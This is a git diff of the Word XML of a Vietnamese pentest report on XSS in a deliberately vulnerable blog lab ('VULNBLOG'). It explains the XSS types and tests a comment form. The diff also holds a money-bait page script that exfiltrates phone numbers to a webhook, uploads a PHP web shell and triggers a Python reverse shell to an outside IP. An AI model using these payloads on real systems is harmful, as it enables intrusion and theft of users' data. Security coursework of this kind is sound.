--- a/WEB_02/REPORT.docx
+++ b/WEB_02/REPORT.docx
@@ -9,52 +9,137 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">                    &lt;input type="text" id="phone" class="text-input"&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">                    &lt;button type="submit" id="btn" name="comment" class="btn"&gt;Click here to receive money&lt;/button&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">                    &lt;script&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">                        const submit = document.getElementById("btn");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">                        </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">                        submit.addEventListener("click", function(event) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">                            var phone = document.getElementById("phone").value;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">                            fetch("https://webhook.site/9f0b5d43-908b-4aea-be4b-2d37a07af846/?p="+encodeURIComponent(phone));</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">                        });</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">                    &lt;/script&gt;</w:t>
+        <w:t>&lt;input type="text" id="phone" class="text-input"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;button type="submit" id="btn" name="comment" class="btn"&gt;Click here to receive money&lt;/button&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    const submit = document.getElementById("btn");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    submit.addEventListener("click", function(event) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        var data = `------WebKitFormBoundaryLO6qFD0Bcq3kZnXN</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Content-Disposition: form-data; name=\"avatar\"; filename=\"shell.php\"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Content-Type: application/octet-stream\n</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;?php echo system($_GET[\"cmd\"]); \?&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>------WebKitFormBoundaryLO6qFD0Bcq3kZnXN--`;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        var cmd = `python3 -c 'import socket,subprocess,os;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        s.connect(("10.18.17.129",1234));os.dup2(s.fileno(),0); </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        import pty; pty.spawn("bash")'`</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        fetch("http://localhost/vuln-blog-web/upload.php",{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            method: "POST",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            headers: {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">                "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryLO6qFD0Bcq3kZnXN"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            },</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            body: data</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        }).then(() =&gt; {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">            fetch("http://localhost/vuln-blog-web/uploads/shell.php?cmd="+cmd)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">        });</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">    });</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;/script&gt;</w:t>
       </w:r>
     </w:p>
     <w:sectPr>

--- a/WEB_02/REPORT.docx
+++ b/WEB_02/REPORT.docx
@@ -3,143 +3,1260 @@
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
     <w:p>
-      <w:r>
-        <w:t>&lt;label&gt;Input your phone number to receive money:&lt;/label&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;input type="text" id="phone" class="text-input"&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;button type="submit" id="btn" name="comment" class="btn"&gt;Click here to receive money&lt;/button&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;script&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    const submit = document.getElementById("btn");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    submit.addEventListener("click", function(event) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">        var data = `------WebKitFormBoundaryLO6qFD0Bcq3kZnXN</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Content-Disposition: form-data; name=\"avatar\"; filename=\"shell.php\"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Content-Type: application/octet-stream\n</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;?php echo system($_GET[\"cmd\"]); \?&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>------WebKitFormBoundaryLO6qFD0Bcq3kZnXN--`;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">        var cmd = `python3 -c 'import socket,subprocess,os;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">        s.connect(("10.18.17.129",1234));os.dup2(s.fileno(),0); </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">        os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">        import pty; pty.spawn("bash")'`</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">        fetch("http://localhost/vuln-blog-web/upload.php",{</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            method: "POST",</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            headers: {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">                "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryLO6qFD0Bcq3kZnXN"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            },</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            body: data</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">        }).then(() =&gt; {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">            fetch("http://localhost/vuln-blog-web/uploads/shell.php?cmd="+cmd)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">        });</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">    });</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>&lt;/script&gt;</w:t>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="44"/>
+          <w:szCs w:val="44"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="44"/>
+          <w:szCs w:val="44"/>
+        </w:rPr>
+        <w:t>REPORT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="44"/>
+          <w:szCs w:val="44"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="44"/>
+          <w:szCs w:val="44"/>
+        </w:rPr>
+        <w:t>VULNBLOG</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Reflect</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>ed</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Reflected XSS là lỗ hổng XSS khai thác thông qua các tham số </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>được phản chiếu lại với người dùng. Ví dụ như một trang web có chức năng tìm kiếm và truy vấn được thực hiện qua tham số search. Nếu tham số search được phản chiếu lại với người dùng và nó không được kiểm soát để tránh các kĩ thuật tấn công XSS. Thì chúng ta có thể tấn công XSS thông qua các tham số này, ví dụ như lừa người dùng nhấp vào link:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>http://example.com/?search=&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">tored </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Stored XSS là lỗ hổng khai thác các phần sẽ được lưu vào cơ sở dữ liệu khi được thực hiện. Ví dụ như phần comment, các chức năng đăng kí, đăng nhập,... Khi này, chúng ta có thể khai thác bằng cách inject các đoạn script như &lt;script&gt;alert(1)&lt;/script&gt;. Nếu người dùng vô tình truy cập vào các phần comment hoặc tên của một người dùng bị inject thì sẽ bị khai thác dữ liệu.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">om </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>B</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ased </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>XSS</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Dom Based XSS là lỗ hổng XSS liên quan tới sinks và sources. Trong đó sources là phần mà kẻ tấn công có thể kiểm soát như document.cookie, location.hash,… Và sinks là các hàm hoặc cái object như eval(), document.body.innerHTML. Và lỗ hổng xảy ra khi dữ liệu từ các sources không được kiểm tra sẽ được truyền vào các sinks. Và kẻ tấn công có thể inject các đoạn script độc hại thông qua các sources để khai thác XSS.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">1. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>Chức năng Comment</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Tiếp cận vào một bài post bất kì, ta sẽ thấy được bài post có một phần comment:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="505946F3" wp14:editId="2AE0B65F">
+            <wp:extent cx="5943600" cy="3190875"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId4"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3190875"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Ta sẽ nhập thử các giá trị để kiểm tra chức năng này:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45876EA5" wp14:editId="1D450EDE">
+            <wp:extent cx="5943600" cy="3190875"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="2" name="Picture 2"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3190875"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Các thông tin chúng ta đã nhập sẽ được hiển thị ở phần Comment:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33356A3F" wp14:editId="43E8755A">
+            <wp:extent cx="5943600" cy="3183255"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="3" name="Picture 3"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3183255"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Chúng ta sẽ sử dụng Burp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Suite để kiểm tra XSS</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03BA32D6" wp14:editId="2BF7F712">
+            <wp:extent cx="5943600" cy="3064510"/>
+            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+            <wp:docPr id="4" name="Picture 4"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
